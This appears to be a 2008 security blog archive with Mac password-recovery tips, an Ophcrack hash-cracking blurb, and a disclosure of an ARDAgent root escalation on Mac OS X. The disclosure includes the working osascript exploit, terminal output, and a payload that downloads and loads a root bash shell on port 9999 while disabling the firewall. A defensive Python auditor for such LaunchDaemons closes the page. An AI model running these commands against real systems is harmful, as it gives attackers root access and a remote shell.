
Recover a Mac WIFI Password

October 19th, 2008 by admin in Apple, Password Info, Wireless

There are a couple of ways to get to this data, including simply using the Keychain Access utility, but probably the easiest way to get to this specific data is to go through Airport System Preferences. Go into the Airport control area of Mac OS X and you’ll find a list of all the different networks you’ve successfully joined in the past, including those with and without passwords.

Open up System Preferences -> Network -> Airport -> Configure…:

Pick the network you need and click on the little “EDIT” button and a new window pops up with specific information on this network:

Click on the “Show Password” checkbox, and ….

The password is shown in hex, but don't worry: it will still work when you paste it into a new WIFI profile, if you choose to create one.

Recover Mac OSX Passwords with Keychain

October 18th, 2008 by admin in Apple, Password Info

Have you forgotten a password to a website, email account, or other password? If you use Mac OS X’s Keychain, chances are that your password can be easily retrieved.

First off, open Keychain (located in /Applications/Utilities/).

Once there, scroll through the list of keys until you find the one that you’re looking for. Double click on it and check the box that says, “Show Password.” Once you authenticate with your user credentials, your forgotten password will be displayed in the text box.

OphCrack Live CD – Crack Windows Passwords

September 20th, 2008 by Dev Team in News, Password Info, windows

Ophcrack LiveCD is a free bootable Windows password cracking CD based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

» Runs on Windows, Linux/Unix, Mac OS X, …
» Cracks LM and NTLM hashes.
» Free tables available for Windows XP and Vista.
» Brute-force module for simple passwords.
» LiveCD available to simplify the cracking.
» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

Reset a lost OS X password

September 6th, 2008 by admin in Apple, News, Password Info

If you’ve forgotten your Mac’s admin account password, don’t worry. Assuming you haven’t locked out OpenFirmware, it’s a pretty simple task to change your password back to something you know.

Here’s how:

Mac OS X Root Escalation Through AppleScript [Local]

June 15th, 2008 by admin in Apple, News, Uncategorized

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

I don't have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here's an example:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl "'

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

To remove, run 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'.

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.
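The persistence the post describes is a LaunchDaemon plist that makes launchd hand a listening socket to an interactive bash. As an added defensive check (my example, not code from the post or from Apple), the Python below uses the standard library's plistlib to audit a LaunchDaemons-style directory for jobs that run a shell or interpreter with a launchd-managed socket. The two sample plists are constructed, since the post's bash.plist itself is never shown; the SHELLS list and the temporary directory standing in for /System/Library/LaunchDaemons are assumptions.

```python
import plistlib
import tempfile
from pathlib import Path

# Interpreters that hand a shell to whoever connects once launchd passes them the socket (assumed list).
SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/csh", "/usr/bin/nc", "/usr/bin/perl", "/usr/bin/python"}
# Constructed samples (the post's bash.plist itself is not shown): a port-9999 interactive bash, and a benign job.
SHELL_DAEMON = plistlib.dumps({
    "Label": "bash",
    "ProgramArguments": ["/bin/bash", "-i"],
    "Sockets": {"Listeners": {"SockServiceName": "9999"}},
    "inetdCompatibility": {"Wait": False},
})
BENIGN_DAEMON = plistlib.dumps({
    "Label": "com.example.cleanup",
    "ProgramArguments": ["/usr/bin/find", "/tmp", "-mtime", "+7", "-delete"],
    "StartInterval": 86400,
})

def audit_daemon(plist_bytes):
    """Return why a launchd job looks like a network-reachable shell (empty list if it does not)."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    findings = []
    if args and args[0] in SHELLS:
        findings.append("program is a shell/interpreter: " + " ".join(args))
    if "-i" in args[1:]:
        findings.append("interactive flag -i")
    for name, spec in job.get("Sockets", {}).items():  # launchd opens these before the job runs
        for sock in (spec if isinstance(spec, list) else [spec]):
            findings.append(f"launchd listener {name} on port {sock.get('SockServiceName', '?')}")
    if job.get("inetdCompatibility"):
        findings.append("inetdCompatibility: accepted socket wired to stdin/stdout")
    return findings

def audit_directory(directory):
    """Audit every *.plist in a LaunchDaemons-style directory; return {file name: findings}."""
    report = {}
    for path in sorted(Path(directory).glob("*.plist")):
        if findings := audit_daemon(path.read_bytes()):
            report[path.name] = findings
    return report

def demo():
    """Stand-in for auditing /System/Library/LaunchDaemons: write both samples to a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "bash.plist").write_bytes(SHELL_DAEMON)
        Path(tmp, "com.example.cleanup.plist").write_bytes(BENIGN_DAEMON)
        return audit_directory(tmp)
```

On a real system, point audit_directory at /System/Library/LaunchDaemons and /Library/LaunchDaemons; any job it reports deserves the unload-and-remove treatment described above.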